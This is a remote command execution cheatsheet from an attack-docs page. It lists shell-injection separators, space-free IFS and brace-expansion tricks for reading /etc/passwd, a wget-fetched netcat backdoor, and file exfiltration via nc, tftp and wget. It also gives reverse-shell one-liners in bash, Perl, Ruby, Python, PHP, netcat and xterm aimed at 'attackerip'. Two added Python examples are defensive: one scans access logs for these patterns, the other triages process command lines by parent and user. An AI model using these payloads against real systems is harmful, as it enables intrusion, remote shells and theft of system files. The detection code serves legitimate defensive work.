Remote Command Exec Cheatsheet
Executing Commands
Various ways of separating Commands:
blah;blah2
blah ^ blah 2
blah && blah2
FAIL || X
blah%0Dblah2%0Dblah3
`blah`
`blah & blah2`
Shell commands without spaces
Using Internal Field Separator (IFS):
Test for cmd injection without spaces:
sleep${IFS:0:1}20
Example IFS netcat backdoor without spaces:
{wget,http://attackerip/nc}
{chmod,+x,./nc}
{./nc,-l,-p,1234,-e,/bin/bash}
$IFS shell variable:
cat$IFS/etc/passwd
increment the first +1 to retrieve the entire file, line by line
cat$IFS/etc/passwd|tail$IFS-n+1|head$IFS-n+1
Shell Variables:
CMD=$'cat\x20/etc/passwd';$CMD
shell variable, increment through file one line at a time:
increment the first +1 to retrieve the entire file, line by line
SP=$'\x20';cat$SP/etc/passwd|tail$SP-n+1|head$SP-n+1
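As an added example (not part of the original cheatsheet), the following Python applies the separator and no-space patterns from the two sections above to decoded query-string values in a web access log, then shows the allowlist check that removes the problem on the application side by never handing the value to a shell. The log lines, the `/cgi-bin/ping` endpoint and the `host` parameter are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Indicator name -> pattern. Each one corresponds to a separator or no-space
# trick listed in the cheatsheet above. Values are checked after percent-
# decoding, so %0D, %3B, %7B ... are matched as the characters they encode.
INDICATORS = {
    "semicolon":       re.compile(r";"),
    "and_list":        re.compile(r"&&"),
    "or_list":         re.compile(r"\|\|"),
    "pipe":            re.compile(r"(?<!\|)\|(?!\|)"),
    "ampersand":       re.compile(r"(?<!&)&(?!&)"),
    "caret":           re.compile(r"\^"),                # cmd.exe separator trick
    "newline_or_cr":   re.compile(r"[\r\n]"),            # %0D / %0A
    "backtick":        re.compile(r"`"),
    "subshell":        re.compile(r"\$\("),
    "ifs_variable":    re.compile(r"\$\{?IFS"),          # $IFS and ${IFS:0:1}
    "ansi_c_quote":    re.compile(r"\$'"),               # $'cat\x20/etc/passwd'
    "brace_expansion": re.compile(r"\{[^{}\s]*,[^{}\s]*\}"),  # {cat,/etc/passwd}
}


def find_injection_indicators(value: str) -> list[str]:
    """Names of all indicators present in an already-decoded parameter value."""
    return [name for name, rx in INDICATORS.items() if rx.search(value)]


# Apache/nginx style access log: only the quoted request line is needed.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def scan_access_log(lines):
    """Return (client_ip, param, decoded_value, indicators) for every flagged parameter."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        client_ip = line.split(" ", 1)[0]
        query = urlsplit(m.group("target")).query
        # parse_qs percent-decodes values, so "%3B" is seen as ";" before matching.
        for param, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                hits = find_injection_indicators(value)
                if hits:
                    findings.append((client_ip, param, value, hits))
    return findings


# Mitigation side: an allowlist for the one shape the parameter may take
# (DNS-style labels only) and an argv list instead of a shell command string.
HOSTNAME_RE = re.compile(
    r"[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*")


def is_safe_hostname(value: str) -> bool:
    """fullmatch, not match/search: "$" would accept a trailing newline."""
    return len(value) <= 253 and HOSTNAME_RE.fullmatch(value) is not None


def build_ping_argv(host: str) -> list[str]:
    """Argv for subprocess.run(argv) without shell=True: separators carry no meaning."""
    if not is_safe_hostname(host):
        raise ValueError(f"rejected host parameter: {host!r}")
    return ["ping", "-c", "1", host]


# Constructed sample log lines for this example (hypothetical ping CGI).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /cgi-bin/ping?host=example.com HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /cgi-bin/ping?host=example.com%3Bcat%20/etc/passwd HTTP/1.1" 200 2048',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /cgi-bin/ping?host=example.com%26%26sleep%24%7BIFS%3A0%3A1%7D20 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /cgi-bin/ping?host=x%0Dwhoami HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /cgi-bin/ping?host=%7Bcat,/etc/passwd%7D HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for client_ip, param, value, hits in scan_access_log(SAMPLE_LOG):
        print(f"{client_ip} {param}={value!r} -> {', '.join(hits)}")
    print(build_ping_argv("example.com"))
```

The detector is a triage aid, not a filter: a deny-list of metacharacters can always be evaded, which is why the `host` value is validated against an allowlist and passed as a separate argv element rather than interpolated into a shell string.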
Exfiltrating Files / Data
FTP
Write the FTP commands to a new text file with echo, then redirect that file into ftp
NC
nc -e /bin/sh
NC
echo /etc/passwd | nc host port
TFTP
echo put /etc/passwd | tftp host
WGET:
wget --post-file /etc/passwd
One-Liner Reverse Shells
On the listener
$ nc -l -p 1234 -vvv
On the remote host...
Bash:
$ bash -i >& /dev/tcp/attackerip/1234 0>&1
$ exec 5<>/dev/tcp/attackerip/1234
$ cat <&5 | while read line; do $line 2>&5 >&5; done
Perl
$ perl -e 'use Socket;$i="attackerip";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Perl for Windows target
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:1234");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Ruby
$ ruby -rsocket -e'f=TCPSocket.open("attackerip",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Python
$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attackerip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP
$ php -r '$sock=fsockopen("attackerip",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
(Assumes the TCP socket is file descriptor 3. If it doesn't work, try 4, 5, or 6)
Netcat
$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip 1234 >/tmp/f
Bash
bash -i >& /dev/tcp/attackerip/1234 0>&1
XTERM
To catch incoming xterm, start an open X Server on your system (:1 - which listens on TCP port 6001) with Xnest:
Xnest :1
Authorize the target IP's connection to you:
Run this OUTSIDE the Xnest:
xterm -display 127.0.0.1:1
Run this INSIDE the spawned xterm on the open X Server
xhost +targetip
Then on the target, assuming that xterm is installed, connect back to the open X Server on your system:
xterm -display attackerip:1
or
DISPLAY=attackerip:0 xterm
It will try to connect back to you, attackerip, on TCP port 6001.
If the xterm path is not within the PATH environment variable, you need to specify its filepath. Solaris path example:
/usr/openwin/bin/xterm -display attackerip:1
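An added example, not part of the original page, showing how the exfiltration, reverse shell and xterm one-liners above translate into host-side detection: regex rules over process command lines, combined with the parent process and user context that separates a web worker spawning a reverse shell from an administrator's interactive session. The process events, the user and parent names and the 203.0.113.10 address are constructed for this example; the rule set is an illustration, not a production signature pack.

```python
import os
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """One process-creation record, as an auditd/EDR pipeline might deliver it (constructed)."""
    pid: int
    user: str
    parent: str      # image name of the parent process
    cmdline: str


# Rule name -> pattern over the command line. Each pattern mirrors one of the
# exfiltration, reverse-shell or xterm one-liners in the cheatsheet above.
RULES = {
    "bash_dev_tcp":        re.compile(r"/dev/tcp/[\w.:\-]+/\d+"),
    "nc_exec_shell":       re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s*/bin/(ba)?sh"),
    "mkfifo_nc_pipe":      re.compile(r"\bmkfifo\b.*\b(nc|ncat|netcat)\b"),
    "perl_socket_shell":   re.compile(r"\bperl\b.*\bSocket\b.*\b(exec|system)\b"),
    "python_socket_dup2":  re.compile(r"\bpython\d?\b.*\bsocket\b.*\bdup2\b"),
    "php_fsockopen_exec":  re.compile(r"\bphp\b.*\bfsockopen\b.*\b(exec|system|shell_exec)\b"),
    "ruby_tcpsocket_exec": re.compile(r"\bruby\b.*\bTCPSocket\b.*\bexec\b"),
    # xterm pointed at a display that is not local (127.0.0.1, localhost or a bare ":N")
    "xterm_remote_display": re.compile(
        r"\bxterm\b.*-display\s+(?!127\.0\.0\.1|localhost|:)\S+"
        r"|DISPLAY=(?!127\.0\.0\.1|localhost|:)\S+:\d+\s+\S*xterm\b"),
    "nc_stdin_exfil":      re.compile(r"\|\s*(nc|ncat|netcat)\s+\S+\s+\d+\b(?!.*\s-e\b)"),
    "tftp_put":            re.compile(r"\becho\s+put\s+\S+\s*\|\s*tftp\b"),
    "wget_post_file":      re.compile(r"\bwget\b.*--post-file\b"),
}

WEB_SERVER_PARENTS = {"httpd", "apache2", "nginx", "php-fpm"}
SERVICE_USERS = {"www-data", "apache", "nginx", "http"}
SHELLS = {"sh", "bash", "dash", "zsh"}


def triage(events):
    """Return one report per event: matched rules, context flags and a severity."""
    reports = []
    for ev in events:
        hits = [name for name, rx in RULES.items() if rx.search(ev.cmdline)]
        context = []
        if ev.parent in WEB_SERVER_PARENTS:
            context.append("spawned_by_web_server")
        if ev.user in SERVICE_USERS:
            context.append("service_account")
        image = os.path.basename(ev.cmdline.split(None, 1)[0])
        if hits and context:
            severity = "high"        # shell/exfil pattern coming out of a web worker
        elif hits:
            severity = "medium"      # pattern present, but in an interactive user's session
        elif context and image in SHELLS:
            severity = "info"        # web server spawning a shell: worth a look, not an alert alone
        else:
            severity = "none"
        reports.append({"pid": ev.pid, "user": ev.user, "parent": ev.parent,
                        "hits": hits, "context": context, "severity": severity})
    return reports


# Constructed sample events; 203.0.113.10 is a documentation-range address.
SAMPLE_EVENTS = [
    ProcessEvent(4011, "www-data", "apache2",
                 'sh -c "bash -i >& /dev/tcp/203.0.113.10/1234 0>&1"'),
    ProcessEvent(4012, "www-data", "apache2",
                 'python -c "import socket,subprocess,os;s=socket.socket();'
                 "s.connect(('203.0.113.10',1234));os.dup2(s.fileno(),0);"
                 "subprocess.call(['/bin/sh','-i'])\""),
    ProcessEvent(4020, "alice", "sshd", "xterm -display 203.0.113.10:1"),
    ProcessEvent(4021, "alice", "bash", "xterm -display 127.0.0.1:1"),
    ProcessEvent(4030, "www-data", "apache2",
                 'sh -c "echo /etc/passwd | nc 203.0.113.10 4444"'),
    ProcessEvent(4040, "www-data", "apache2", 'sh -c "ls -la /var/www/html"'),
    ProcessEvent(4050, "root", "cron",
                 "/usr/bin/wget -q https://mirror.example.org/update.tar.gz -O /tmp/update.tar.gz"),
]

if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        print(f"pid={r['pid']} {r['severity']:6} hits={r['hits']} context={r['context']}")
```

The command-line patterns alone produce a medium severity, because an `xterm -display` or a `python -c` with sockets can be legitimate on a workstation; it is the parent/user context that turns the same pattern into a high-severity finding. The local-display exclusion in `xterm_remote_display` keeps the listener-side `xterm -display 127.0.0.1:1` from the setup steps above out of the results.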
More docs: /docs/attack-docs/remote-cmd-exfiltration/